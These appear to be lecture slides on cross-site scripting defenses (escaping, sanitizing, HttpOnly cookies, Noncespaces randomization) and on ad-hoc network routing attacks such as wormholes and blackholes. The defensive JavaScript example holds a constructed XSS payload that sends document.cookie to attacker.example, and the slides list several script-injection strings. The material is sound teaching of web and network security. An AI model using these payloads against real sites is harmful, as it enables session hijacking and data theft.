This Material Will Not be In Final Exam. Cross-Site Scripting (XSS)


This Material Will Not be In Final Exam

Cross-Site Scripting (XSS)

What is XSS?
- A vulnerability in Web applications that lets attackers inject client-side scripts into pages served by a third-party Web site
- Browsers of other visitors to the compromised page run the script in that site's origin, so the script can read or act on any data the browser handles for that site (cookies, page content, requests made on the user's behalf)
- The popularity of these exploits has grown and, at the time of these slides, had surpassed that of buffer overflow exploits

Non-persistent (Reflected) XSS Vulnerability
- Web server does not properly sanitize user input but echoes it as-is into a dynamically generated reply (Web page)
  - The reply therefore contains the attacker's script
- Attacker crafts a URL with the script embedded in it
  - URL points to the target site and supplies some input plus the script
  - Entice the user to click on the URL
  - The script runs in the target site's origin and steals information the user shares with that site, e.g. a session cookie

Example (parties: Attacker, User, Google)
1. Attacker to User: "Click here: …" (a link to the target site carrying the script in a request parameter)
2. User's browser sends the parameter in an HTTP GET to the Google homepage: "something …"
3. The page echoes the parameter back, and the attacker's script executes with Google's privileges, i.e. in Google's origin inside the user's browser

Persistent (Stored) XSS Vulnerability
- Data provided by the attacker is stored by the server and displayed to every future user
  - E.g. when posts to online message boards are not properly sanitized
- Such a script runs in the site's origin in every viewer's browser, so it can access anything the site's own pages can: the viewer's cookies, the page content, and the site's functionality on the viewer's behalf

Where Do Vulnerabilities Occur?
- In server code that processes user input and dynamically renders the resulting page (reflected and persistent XSS)
- In client code that runs in the browser and renders Web pages with data from the server or from the URL (DOM-based XSS)
  - Mostly JavaScript
  - Document Object Model (DOM): the standard model for representing HTML and XML content, which scripts read and modify

Defense: Escape User Input
- Ensure that characters of the input are treated as data, not as code
  - Translate any dangerous characters into an encoded form of the same characters that cannot be interpreted as markup
  - E.g., translate < into &lt;, > into &gt;, & into &amp;, and quotes into &quot; or &#x27;
  - The escaping must match the context the data lands in (HTML body, attribute value, JavaScript string, URL); HTML-body escaping alone does not protect a value placed inside a script block or an unquoted attribute
- Some input could be encoded in a different charset
  - Enforce the charset in each server reply (e.g. Content-Type: text/html; charset=utf-8) so that the interpretation of the user's input is fixed and cannot be shifted by the attacker
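The two rendering paths described above, as an added JavaScript example (not code from the slides): a search page that echoes the query parameter unsafely, the same page with HTML-body escaping, and a fixed charset on the reply. The page template and the attacker payload are constructed for the example.

```javascript
"use strict";

// Entity map for the HTML-body and quoted-attribute contexts. '&' is
// included so an attacker cannot smuggle entities of their own; both quote
// characters are included so the same output is safe inside a quoted
// attribute value. Other contexts (JavaScript strings, URLs, CSS) need
// their own encoders.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#x27;",
  "/": "&#x2F;",
};

function escapeHtml(text) {
  return String(text).replace(/[&<>"'/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: the query parameter is spliced straight into the markup.
function renderUnsafe(query) {
  return `<h1>Results for: ${query}</h1>`;
}

// Hardened: identical page, input escaped for the HTML-body context.
function renderEscaped(query) {
  return `<h1>Results for: ${escapeHtml(query)}</h1>`;
}

// Fix the charset on every reply so the browser cannot be induced to decode
// the bytes under a different encoding and turn harmless bytes into '<'.
function responseHeaders() {
  return { "Content-Type": "text/html; charset=utf-8" };
}

// Illustrative check only: does the rendered page contain a real <script>
// start tag, as opposed to the escaped text "&lt;script&gt;"?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed payload as it would arrive in ?q=... after URL decoding.
const PAYLOAD =
  '<script>new Image().src="https://attacker.example/c?" + document.cookie</script>';

console.log(renderUnsafe(PAYLOAD));  // the script tag survives: XSS
console.log(renderEscaped(PAYLOAD)); // rendered as visible text, never executed
```

The escaped page is correct only because the value lands in the element body; the same `escapeHtml` output would still be dangerous inside an inline event handler or a `<script>` block, which is why the context has to be known before the encoder is chosen.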

Defense: Validate User Input
- Some Web sites want to allow users to input and render HTML
  - E.g., HTML markup in online posts and similar user-authored content
  - Escaping does not help here since it would destroy the HTML markup
  - User input must pass through an HTML policy engine (sanitizer) that parses the markup and keeps only allow-listed tags and attributes, so that what remains cannot contain XSS

Defense: Cookie Security
- Because XSS can be used to steal cookies, sites cannot rely only on cookies for authentication
  - Tie cookies to specific IPs (breaks for users whose address changes, and does not stop a script that acts from the victim's own browser)
  - HttpOnly flag: the browser withholds the cookie from scripts (document.cookie) and only attaches it to HTTP requests, so an injected script cannot read and exfiltrate it, although it can still issue requests that carry the cookie
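A check a practitioner would run against the session cookie a site sets, as an added example (not from the slides): parse the Set-Cookie header and report which of the flags that limit cookie theft are missing. The header strings are constructed.

```javascript
"use strict";

// Parse one Set-Cookie header value into name, value and an attribute map
// keyed by lower-cased attribute name (true for flags without a value).
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const cookie = {
    name: eq === -1 ? pair : pair.slice(0, eq),
    value: eq === -1 ? "" : pair.slice(eq + 1),
    attributes: {},
  };
  for (const attr of attrs) {
    if (!attr) continue;
    const i = attr.indexOf("=");
    const key = (i === -1 ? attr : attr.slice(0, i)).toLowerCase();
    cookie.attributes[key] = i === -1 ? true : attr.slice(i + 1);
  }
  return cookie;
}

// Problems with a session cookie, as a list of strings (empty = fine).
// HttpOnly keeps the value out of document.cookie, Secure keeps it off
// plaintext HTTP, SameSite limits cross-site sends. None of them stops an
// injected script from making same-origin requests that carry the cookie;
// they limit what can be stolen, which is the point the slide makes.
function auditSessionCookie(header) {
  const { attributes: a } = parseSetCookie(header);
  const problems = [];
  if (!a.httponly) problems.push("missing HttpOnly: document.cookie exposes the value to injected scripts");
  if (!a.secure) problems.push("missing Secure: cookie is sent over plaintext HTTP");
  if (!a.samesite) {
    problems.push("missing SameSite: cookie rides along on cross-site requests");
  } else if (String(a.samesite).toLowerCase() === "none" && !a.secure) {
    problems.push("SameSite=None requires Secure");
  }
  return problems;
}

// Constructed sample headers.
const WEAK = "SESSIONID=7f3a9c; Path=/";
const HARDENED = "SESSIONID=7f3a9c; Path=/; HttpOnly; Secure; SameSite=Lax";

console.log(auditSessionCookie(WEAK));
console.log(auditSessionCookie(HARDENED)); // []
```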

Defense: Disabling Scripts
- Browser-side defense
  - Makes some Web pages not render correctly
  - Could be turned off for selected sites that are trusted to be well secured against XSS

XML Randomization XSS Defense
- Web application randomizes XML tag prefixes before delivering a document to the client
  - Hard for the attacker to predict the randomized prefixes
  - Injected content therefore cannot carry a trusted prefix and cannot introduce scripts through application input
Noncespaces: Using Randomization to Enforce Information Flow Tracking and Thwart Cross-Site Scripting Attacks, Matthew Van Gundy and Hao Chen. In Proceedings of the 16th Annual Network and Distributed System Security Symposium (NDSS), 2009.

Insertion Vectors (a review object whose text field is rendered as a tag body and whose contact field is rendered as an attribute value)
- Tag body – review.text = <script>attack()</script>
- Node splitting – review.text = </p><script>attack()</script><p>
- Attribute value – review.contact = javascript:attack()
- Attribute splitting – review.contact = " onclick="javascript:attack()
- Tag splitting – review.contact = "><script>attack()</script>
[Noncespaces, Van Gundy and Chen, NDSS 2009]

Tag Prefix Randomization
- XML namespaces
  - User chooses a prefix for a tag
  - E.g. for tag:
- Leverage XML prefixes to annotate the document with trust classes
  - Label of each trust class is random and hard for the attacker to guess
- Prefixes are randomly chosen on each document delivery
[Noncespaces, Van Gundy and Chen, NDSS 2009]

Example From Paper: figure "Attack code" [Noncespaces, Van Gundy and Chen, NDSS 2009]

Trust Policy
- Defines which (prefixed) tags are trusted
- Defines the HTML tags and operations that are allowed in untrusted content
- Everything else is denied
- Server delivers both the potentially hazardous content and the trust policy
- Client browser enforces the policy on the server-delivered content
[Noncespaces, Van Gundy and Chen, NDSS 2009]

Deployment
- Both client and server need to be modified
- Easy add-on to existing software
- A client-side proxy can protect multiple clients in a network
[Noncespaces, Van Gundy and Chen, NDSS 2009]

MANET Security

What Is a MANET?
- Mobile Ad-Hoc Network
  - Wireless nodes
  - Changing topology
  - Possibly no trusted authority
  - Usually battery operated, with limited CPU and memory

Security Challenges
- Wireless medium: sniffing and jamming are easy, impersonation too
- Peers act as routers: no trust in routers, which may sniff, drop or fabricate data
- Changing topology: routes are learned on the fly and can be manipulated by attackers
- No trust infrastructure or trusted entities: how to distribute keys?
- Limited resources: algorithms must be simple and cheap

Physical/Link Layer Attacks
- Sniffing: attackers can easily pick up wireless transmissions because they are broadcast on a known frequency (MAC spoofing is possible too)
  - Defenses: frequency hopping, directional antennas, encryption
- Jamming is easy
  - But the attacker needs a powerful transmitter
  - Defense: directional antennas
- MAC protocol misuse to monopolize the shared medium
  - How to create a distributed protocol that detects and penalizes misbehavior?

Ad-Hoc Routing: DSR
- Routes are learned when needed (on demand, because of mobility)
- Dynamic Source Routing (DSR): the source puts the entire route in the packet header
- Route discovery
  - Request messages are broadcast
  - Intermediate nodes add themselves to the message
  - Reply is unicast to the source with the full path recorded
  - Nodes can cache overheard routes and may reply from cache
  - Link breakage results in error messages that delete routes in the network that use the broken link

Ad-Hoc Routing: AODV
- Ad-hoc On-Demand Distance Vector Routing: the source specifies only the destination, and routers on the path forward as they see fit
- Route discovery
  - Request messages are broadcast
  - Intermediate nodes repeat the message and cache the next hop towards the source
  - Reply is unicast to the source; intermediate nodes cache the next hop towards the destination
  - An intermediate node may reply from cache
  - When a link breaks, an intermediate node may attempt to rediscover a new route
  - Error messages remove routes that used the broken link

Routing Attacks
- Routing message flooding (DoS)
- Routing table overflow: fill it with bogus routes
- Routing cache poisoning is easy: just fabricate requests or replies with a spoofed source
- Fabricate false error messages to tear down working routes

Network Layer Attacks
- Drop packets, modify them or replay them
- Delay packets
- Inject junk traffic
- Wormhole attack: tunnel packets to another location in the network
- Blackhole attack: make the node part of many routes, then drop all traffic

Wormhole Attacks
- Attacker records traffic at one point in the MANET, tunnels it (perhaps selectively) to another point and replays it there
- Replayed traffic can arrive sooner than the original traffic would over legitimate hops
  - This leads to the attacker's nodes becoming part of many routes
- The attack works even for traffic not going over attacker nodes directly, and for encrypted traffic, since the packets are only replayed, not read
Wormhole attacks in wireless networks, Yih-Chun Hu, Adrian Perrig, David B. Johnson, IEEE Journal on Selected Areas in Communications, 2006

Detection of Wormhole Attacks
- Packet leash: information added to the packet to restrict the distance it can travel in one hop
  - Geographical: the recipient must be close to the sender. Sender records its location and the time when the packet is sent; the recipient bounds the distance from its own location, allowing for node movement and location error, and checks it against the radio range
  - Temporal: the packet's lifetime ends after a certain time. Sender records the time when the packet is sent; the recipient rejects packets whose travel time implies a distance beyond the radio range. Requires tightly synchronized clocks, since one radio hop takes well under a microsecond
- The recorded information must be authenticated (signed), otherwise the wormhole endpoint could simply rewrite it when replaying
[Hu, Perrig, Johnson, IEEE JSAC 2006]

DoS Attacks
- Consume the node's battery, CPU or memory
- Overflow the node's routing table
- Flood the node with routing messages
- Flood the node with data traffic
- Drop the node's data traffic